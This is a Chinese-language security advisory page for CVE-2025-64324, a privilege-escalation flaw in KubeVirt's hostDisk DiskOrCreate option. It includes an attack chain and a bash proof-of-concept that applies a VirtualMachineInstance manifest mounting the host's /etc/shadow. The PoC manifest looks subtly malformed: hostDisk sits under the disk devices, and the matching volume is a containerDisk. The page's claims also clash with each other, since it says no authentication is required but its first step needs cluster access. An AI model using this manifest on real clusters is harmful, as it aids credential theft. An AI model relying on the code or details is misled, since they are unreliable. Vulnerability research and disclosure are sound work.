CVE-2025-64324 CVSS 7.7 高危

CVE-2025-64324 KubeVirt hostDisk功能权限提升漏洞

披露日期: 2025-11-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64324

漏洞类型

权限提升/本地文件访问

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

KubeVirt

漏洞概述

KubeVirt是Kubernetes的虚拟机管理插件。其hostDisk功能允许将宿主机上的文件或目录（UID 107的用户拥有）挂载到虚拟机中。在1.6.1和1.7.0之前的版本中，DiskOrCreate选项的实现存在逻辑缺陷，攻击者可以利用此漏洞读取和写入宿主机上由更高权限用户拥有的任意文件，从而实现权限提升。该漏洞无需认证即可利用，攻击复杂度低。

技术细节

KubeVirt的hostDisk功能通过将宿主机的文件或目录挂载到VM来实现资源共享。DiskOrCreate选项本应只创建由低权限用户(UID 107)拥有的文件，但由于实现逻辑存在缺陷，攻击者可以通过精心构造的请求，利用DiskOrCreate功能访问和修改宿主机上任意 privileged用户的文件。攻击者可以利用符号链接、路径遍历等技术绕过安全限制，实现对系统关键文件的读写操作。

攻击链分析

STEP 1

攻击者获取KubeVirt集群访问权限

STEP 2

创建配置了DiskOrCreate类型hostDisk的VM实例

STEP 3

通过符号链接或路径遍历指定目标文件路径

STEP 4

VM启动后，攻击者可直接读写宿主机上的目标文件

STEP 5

读取敏感文件(如/etc/shadow)或修改系统配置实现权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-64324 PoC - KubeVirt hostDisk权限提升
# 利用DiskOrCreate选项读取宿主机高权限文件

TARGET_HOST="victim-host"
KUBECONFIG="/path/to/kubeconfig"

export KUBECONFIG

# 创建恶意hostDisk配置，指向目标文件
cat <<EOF | kubectl apply -f -
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: malicious-vmi
spec:
  domain:
    devices:
      disks:
        - name: hostdisk
          hostDisk:
            type: DiskOrCreate
            path: /etc/shadow
            capacity: 1Mi
  volumes:
    - name: hostdisk
      containerDisk:
        image: test/image
EOF

影响范围

KubeVirt < 1.6.1

KubeVirt < 1.7.0

防御指南

临时缓解措施

如果无法立即升级，可通过Kubernetes RBAC限制创建含有hostDisk的VM实例的权限，并启用审计日志监控可疑操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表